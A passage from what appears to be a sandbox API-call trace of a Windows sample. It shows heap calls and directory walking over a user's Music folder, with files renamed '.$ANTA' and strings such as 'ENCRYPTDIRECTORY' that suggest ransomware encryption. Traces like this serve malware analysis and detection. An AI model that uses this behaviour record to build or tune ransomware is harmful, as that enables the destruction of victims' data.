| out: hHeap=0x1780000) returned 1 [0113.510] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391ab8 | out: hHeap=0x1780000) returned 1 [0113.510] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0113.510] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0113.510] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0113.510] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0113.510] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e97a0 [0113.510] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0113.510] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e97a0 | out: hHeap=0x1780000) returned 1 [0113.510] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0113.510] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0113.510] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0113.510] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0113.510] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0113.510] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0113.510] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ea8 [0113.510] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9128 [0113.510] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2620 [0113.510] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9128 | out: hHeap=0x1780000) returned 1 [0113.510] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0113.510] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0113.511] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ea8 | out: hHeap=0x1780000) returned 1 [0113.511] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0113.511] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0113.511] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0113.511] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca418 [0113.511] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca208 [0113.511] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0113.511] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0113.511] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0113.511] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0113.511] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0113.511] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0113.511] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0113.511] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0113.511] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0113.511] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2b0 [0113.511] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0113.511] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0113.511] FindNextFileW (in: hFindFile=0x41ac180, lpFindFileData=0x144ea38 | out: lpFindFileData=0x144ea38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeddcf70, ftCreationTime.dwHighDateTime=0x1d69b3f, ftLastAccessTime.dwLowDateTime=0xeddcf70, ftLastAccessTime.dwHighDateTime=0x1d69b3f, ftLastWriteTime.dwLowDateTime=0xee2277a, ftLastWriteTime.dwHighDateTime=0x1d69b3f, nFileSizeHigh=0x0, nFileSizeLow=0xfc60, dwReserved0=0x144ef30, dwReserved1=0x8, cFileName="D4sWWmt- Hf4jGE2.mp3.$ANTA", cAlternateFileName="D4SWWM~1.$AN")) returned 1 [0113.511] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca418 [0113.511] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8cc0 [0113.511] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0113.511] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0113.511] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0113.511] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0113.511] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8cc0 | out: hHeap=0x1780000) returned 1 [0113.512] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0113.512] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0113.512] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0113.512] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0113.512] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e99c8 [0113.512] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0113.512] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e99c8 | out: hHeap=0x1780000) returned 1 [0113.512] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0113.512] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0113.512] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0113.512] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0113.512] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0113.512] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0113.512] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797048 [0113.512] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e8f00 [0113.512] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0113.512] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e8f00 | out: hHeap=0x1780000) returned 1 [0113.512] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0113.512] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0113.512] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797048 | out: hHeap=0x1780000) returned 1 [0113.512] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0113.512] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0113.512] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0113.512] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca190 [0113.512] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca208 [0113.512] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0113.512] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0113.512] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0113.512] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0113.512] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0113.513] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0113.513] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0113.513] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0113.513] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0113.513] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca418 [0113.513] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2620 [0113.513] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0113.513] FindNextFileW (in: hFindFile=0x41ac180, lpFindFileData=0x144ea38 | out: lpFindFileData=0x144ea38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf0125db, ftCreationTime.dwHighDateTime=0x1d69b3f, ftLastAccessTime.dwLowDateTime=0xf0125db, ftLastAccessTime.dwHighDateTime=0x1d69b3f, ftLastWriteTime.dwLowDateTime=0xf169ae5, ftLastWriteTime.dwHighDateTime=0x1d69b3f, nFileSizeHigh=0x0, nFileSizeLow=0x5980, dwReserved0=0x144ef30, dwReserved1=0x8, cFileName="dle rck7Umm-.wav.$ANTA", cAlternateFileName="DLERCK~1.$AN")) returned 1 [0113.513] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0113.513] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391c78 [0113.513] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0113.513] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0113.513] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0113.513] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0113.513] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391c78 | out: hHeap=0x1780000) returned 1 [0113.513] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0113.513] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0113.513] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0113.513] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0113.513] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9bf0 [0113.513] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0113.513] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9bf0 | out: hHeap=0x1780000) returned 1 [0113.513] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0113.513] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0113.513] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0113.513] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0113.513] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0113.514] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0113.514] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0113.514] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea6b8 [0113.514] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0113.514] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea6b8 | out: hHeap=0x1780000) returned 1 [0113.514] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0113.514] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0113.514] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0113.514] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0113.514] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0113.514] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0113.514] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca2b0 [0113.514] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca418 [0113.514] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0113.514] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0113.514] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0113.514] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0113.514] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0113.514] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0113.514] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0113.514] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0113.514] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0113.514] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0113.514] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0113.514] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0113.514] FindNextFileW (in: hFindFile=0x41ac180, lpFindFileData=0x144ea38 | out: lpFindFileData=0x144ea38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf48aaec, ftCreationTime.dwHighDateTime=0x1d69b3f, ftLastAccessTime.dwLowDateTime=0xf48aaec, ftLastAccessTime.dwHighDateTime=0x1d69b3f, ftLastWriteTime.dwLowDateTime=0xf56fa85, ftLastWriteTime.dwHighDateTime=0x1d69b3f, nFileSizeHigh=0x0, nFileSizeLow=0x16fc0, dwReserved0=0x144ef30, dwReserved1=0x8, cFileName="JUnckwz0f9.wav.$ANTA", cAlternateFileName="JUNCKW~1.$AN")) returned 1 [0113.514] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0113.515] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391a10 [0113.515] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0113.515] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0113.515] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0113.515] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0113.515] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391a10 | out: hHeap=0x1780000) returned 1 [0113.515] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0113.515] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0113.515] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0113.515] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9bf0 | out: hHeap=0x1780000) returned 1 [0113.515] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0113.515] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0113.515] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0113.515] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e99c8 | out: hHeap=0x1780000) returned 1 [0113.515] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0113.515] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0113.515] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0113.515] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0113.515] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0113.515] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0113.515] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0113.515] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0113.515] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0113.515] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0113.515] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0113.515] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0113.515] FindNextFileW (in: hFindFile=0x41ac180, lpFindFileData=0x144ea38 | out: lpFindFileData=0x144ea38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf7d1eab, ftCreationTime.dwHighDateTime=0x1d69b3f, ftLastAccessTime.dwLowDateTime=0xf7d1eab, ftLastAccessTime.dwHighDateTime=0x1d69b3f, ftLastWriteTime.dwLowDateTime=0xf8dd01f, ftLastWriteTime.dwHighDateTime=0x1d69b3f, nFileSizeHigh=0x0, nFileSizeLow=0x12470, dwReserved0=0x144ef30, dwReserved1=0x8, cFileName="P0gI1wm_F5y2n.m4a.$ANTA", cAlternateFileName="P0GI1W~1.$AN")) returned 1 [0113.516] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0113.516] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0113.516] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0113.516] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391e00 | out: hHeap=0x1780000) returned 1 [0113.516] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0113.516] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0113.516] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0113.516] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e8ab0 | out: hHeap=0x1780000) returned 1 [0113.516] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0113.516] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0113.516] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0113.516] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea6b8 | out: hHeap=0x1780000) returned 1 [0113.516] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0113.516] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0113.516] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797048 | out: hHeap=0x1780000) returned 1 [0113.516] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0113.516] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0113.516] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0113.516] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0113.516] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0113.516] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0113.516] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0113.516] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0113.516] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0113.516] FindNextFileW (in: hFindFile=0x41ac180, lpFindFileData=0x144ea38 | out: lpFindFileData=0x144ea38*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcc2064c0, ftCreationTime.dwHighDateTime=0x1d5e225, ftLastAccessTime.dwLowDateTime=0x60f4f620, ftLastAccessTime.dwHighDateTime=0x1d5e2a7, ftLastWriteTime.dwLowDateTime=0x60f4f620, ftLastWriteTime.dwHighDateTime=0x1d5e2a7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x144ef30, dwReserved1=0x8, cFileName="xavp", cAlternateFileName="")) returned 1 [0113.516] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0113.516] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0113.516] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0113.516] FindNextFileW (in: hFindFile=0x41ac180, lpFindFileData=0x144ea38 | out: lpFindFileData=0x144ea38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfa80aa6, ftCreationTime.dwHighDateTime=0x1d69b3f, ftLastAccessTime.dwLowDateTime=0xfa80aa6, ftLastAccessTime.dwHighDateTime=0x1d69b3f, ftLastWriteTime.dwLowDateTime=0xfb6587b, ftLastWriteTime.dwHighDateTime=0x1d69b3f, nFileSizeHigh=0x0, nFileSizeLow=0x14150, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="_lDKW-L4K_DTCAjQT1.wav.$ANTA", cAlternateFileName="_LDKW-~1.$AN")) returned 1 [0113.517] FindNextFileW (in: hFindFile=0x41ac180, lpFindFileData=0x144ea38 | out: lpFindFileData=0x144ea38*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x43e25c0, ftCreationTime.dwHighDateTime=0x144ed98, ftLastAccessTime.dwLowDateTime=0x295a83, ftLastAccessTime.dwHighDateTime=0x43e25c0, ftLastWriteTime.dwLowDateTime=0x43ea268, ftLastWriteTime.dwHighDateTime=0x356310, nFileSizeHigh=0x29c786, nFileSizeLow=0x1809934, dwReserved0=0x144ef30, dwReserved1=0x8, cFileName="", cAlternateFileName="мńဓ+\x10")) returned 0 [0113.517] FindClose (in: hFindFile=0x41ac180 | out: hFindFile=0x41ac180) returned 1 [0113.517] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="|xavp", cchCount1=5, lpString2="", cchCount2=0) returned 3 [0113.517] CharUpperBuffW (in: lpsz="ENCRYPTDIRECTORY", cchLength=0x10 | out: lpsz="ENCRYPTDIRECTORY") returned 0x10 [0113.517] CharUpperBuffW (in: lpsz="_FILELISTTOARRAY", cchLength=0x10 | out: lpsz="_FILELISTTOARRAY") returned 0x10 [0113.517] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\9sMMb260B1u\\xavp\\" (normalized: "c:\\users\\fd1hvy\\music\\9smmb260b1u\\xavp")) returned 0x10 [0113.517] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\9sMMb260B1u\\xavp\\*", lpFindFileData=0x144e7f8 | out: lpFindFileData=0x144e7f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcc2064c0, ftCreationTime.dwHighDateTime=0x1d5e225, ftLastAccessTime.dwLowDateTime=0x60f4f620, ftLastAccessTime.dwHighDateTime=0x1d5e2a7, ftLastWriteTime.dwLowDateTime=0x60f4f620, ftLastWriteTime.dwHighDateTime=0x1d5e2a7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, 